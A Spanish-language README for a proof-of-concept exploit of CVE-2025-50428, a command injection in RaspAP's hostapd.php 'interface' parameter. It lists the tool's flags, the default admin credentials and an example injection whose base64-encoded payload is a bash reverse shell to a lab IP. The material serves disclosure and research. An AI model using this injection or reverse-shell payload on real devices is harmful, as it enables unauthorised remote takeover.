
Prueba de concepto de la vulnerabilidad CVE-2025-50428: Inyección autenticada de comandos del sistema operativo en RaspAP
Una prueba de concepto (PoC) para CVE-2025-50428, una vulnerabilidad de inyección de comandos en RaspAP raspap-webgui 3.2.9 y versiones anteriores.
| ID de Vulnerabilidad | CVE-2025-50428 |
|---|---|
| Severidad | Alta (CVSS 3.1: 8.6) |
| Vector CVSS | CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N |
| Tipo de Vulnerabilidad | Inyección de Código |
| Vector de Ataque | Remoto (Autenticado) |
| Privilegios Requeridos | Bajos |
| Impacto | Ejecución de Código, Escalada de Privilegios |
| Producto Afectado | raspap-webgui ≤ 3.2.9 |
| Descubierto por | SmartTECS Cyber Security GmbH |
Este exploit aprovecha una vulnerabilidad de inyección de comandos en el script hostapd.php de RaspAP. La vulnerabilidad existe debido a una sanitización incorrecta de la entrada del usuario proporcionada a través del parámetro interface. Un atacante autenticado puede inyectar comandos arbitrarios del sistema operativo, lo que resulta en la ejecución de código con los privilegios del usuario www-data.
requests instaladapython3 poc.py --base-url <url> --interface <payload> [--username <usuario>] [--password <contraseña>]
--base-url: URL base de la instalación de RaspAP (p. ej., http://192.168.122.22)--interface: Valor para el parámetro interface, se permite payload de inyección--username: Usuario de RaspAP (por defecto: admin)--password: Contraseña de RaspAP (por defecto: secret)python3 poc.py --base-url http://192.168.122.22 --interface "';echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyMi4xLzEzMzcgMD4mMTs= | base64 -d | bash"
SmartTECS Cyber Security GmbH es una empresa de ciberseguridad especializada en pruebas de penetración, desarrollo seguro de software e investigación de vulnerabilidades. La compañía ofrece evaluaciones de seguridad personalizadas, respuesta a incidentes y servicios de asesoramiento estratégico para ayudar a las organizaciones a proteger sistemas críticos frente a las amenazas cibernéticas en evolución.
Esta herramienta se proporciona estrictamente con fines educativos y de investigación. Úsela únicamente en sistemas que posea o administre con permiso explícito. El autor y SmartTECS Cyber Security GmbH no asumen ninguna responsabilidad por su uso indebido o por daños.